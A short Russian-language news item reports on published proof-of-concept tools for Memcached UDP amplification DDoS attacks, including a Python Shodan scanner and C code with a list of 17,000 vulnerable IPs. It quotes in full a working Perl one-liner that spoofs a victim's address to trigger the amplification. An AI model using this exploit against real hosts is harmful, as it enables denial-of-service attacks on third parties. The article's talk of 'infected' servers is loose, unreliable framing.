Заинтересованные специалисты опубликовали собственные варианты реализации DDoS-атак через заражённые серверы Memcached. Массовая злоумышленная кампания захватила уже более 17 000 IP-адресов и до сих пор не ликвидирована. Атаки достигают рекордных размеров.
Proof-of-Concept
Всего исследователи представили три различных способа использовать скомпрометированные устройства:
- скрипт на языке Python под названием Memcrashed, сканирующий поисковую систему Shodan на наличие IP захваченных серверов Memcached и позволяющий запускать DDoS-атаку на любое желаемое устройство буквально за несколько секунд:
- код на Си из репозитория Pastebin, опубликованный вместе со списком из 17 000 IP уязвимых серверов и извлекающий из него адреса для проведения атаки:
- небольшой эксплойт, уместившийся в один твит:
#memecached UDP 50,000x AMP attack IP-Spoof POC. syntax args: <victim_ip> <memecache_ip>
use Socket;socket R,2,3,255;setsockopt R,0,1,1;send R,pack("H*x4H*a4a4H*Z*",45000019,"52110000",(map{inet_aton$_}@ARGV),"fefe2bcb0017"."0"x14,"\x01\x00\x00stats\r\n"),0,pack"Sna4x8",2,60,pop
— ens (@the_ens) March 3, 2018
Memcached-кампания пока только расширяется. Напомним, что несколько дней назад жертвой атак стал GitHub — наплыв запросов «положил» его на 9 минут.
Источник: BleepingComputer
